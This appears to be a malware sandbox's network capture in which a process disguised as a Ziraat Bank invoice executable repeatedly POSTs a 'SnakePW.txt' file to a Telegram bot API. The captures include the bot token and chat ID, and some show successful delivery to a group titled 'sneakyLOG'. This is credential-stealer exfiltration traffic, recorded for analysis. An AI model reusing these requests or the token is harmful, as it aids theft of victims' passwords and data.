                                      2024-09-26 09:01:12 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 32 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 32 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 12","parameters":{"retry_after":12}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      83192.168.2.449832149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:12 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcfb3d74a07ef1
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:01:12 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 62 33 64 37 34 61 30 37 65 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcfb3d74a07ef1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:13 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:13 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 11
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:13 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 31 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 31 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 11","parameters":{"retry_after":11}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      84192.168.2.449833149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:13 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcfb71bb175392
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:01:13 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 62 37 31 62 62 31 37 35 33 39 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcfb71bb175392Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:14 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:14 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 11
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:14 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 31 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 31 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 11","parameters":{"retry_after":11}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      85192.168.2.449834149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:14 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcfbbbebbd6c73
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:01:14 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 62 62 62 65 62 62 64 36 63 37 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcfbbbebbd6c73Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:15 UTC370INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:14 GMT
                                      Content-Type: application/json
                                      Content-Length: 111
                                      Connection: close
                                      Retry-After: 10
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:15 UTC111INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 31 30 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 31 30 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 10","parameters":{"retry_after":10}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      86192.168.2.449835149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:15 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcfc0bb3f6adf3
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:01:15 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 63 30 62 62 33 66 36 61 64 66 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcfc0bb3f6adf3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:15 UTC369INHTTP/1.1 429 Too Many Requests
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:15 GMT
                                      Content-Type: application/json
                                      Content-Length: 109
                                      Connection: close
                                      Retry-After: 9
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:15 UTC109INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d
                                      Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      87192.168.2.449836149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:16 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dcfc5dd9d17be4
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:01:16 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 63 35 64 64 39 64 31 37 62 65 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dcfc5dd9d17be4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:24 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:24 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:24 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 38 34 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35861,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341284,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      88192.168.2.449837149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:25 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd011f8a276c68
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:01:25 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 31 31 66 38 61 32 37 36 63 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd011f8a276c68Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:25 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:25 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:25 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 38 35 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35862,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341285,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      89192.168.2.449838149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:26 UTC327OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd015482333e8d
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      2024-09-26 09:01:26 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 31 35 34 38 32 33 33 33 65 38 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd015482333e8dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:26 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:26 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-09-26 09:01:26 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 38 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 31 32 38 36 2c 22 64 6f 63 75
                                      Data Ascii: {"ok":true,"result":{"message_id":35863,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727341286,"docu


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      90192.168.2.449839149.154.167.2204437124C:\Users\user\Desktop\ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-26 09:01:27 UTC351OUTPOST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                      Content-Type: multipart/form-data; boundary=------------------------8dd01a2be2e504b
                                      Host: api.telegram.org
                                      Content-Length: 547
                                      Connection: Keep-Alive
                                      2024-09-26 09:01:27 UTC547OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 30 31 61 32 62 65 32 65 35 30 34 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 39 32 37 39 39 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 34 3a 35 39 3a 30 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                      Data Ascii: --------------------------8dd01a2be2e504bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:192799Date and Time: 26/09/2024 / 04:59:04Client IP:
                                      2024-09-26 09:01:27 UTC388INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 26 Sep 2024 09:01:27 GMT
                                      Content-Type: application/json
                                      Content-Length: 515
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
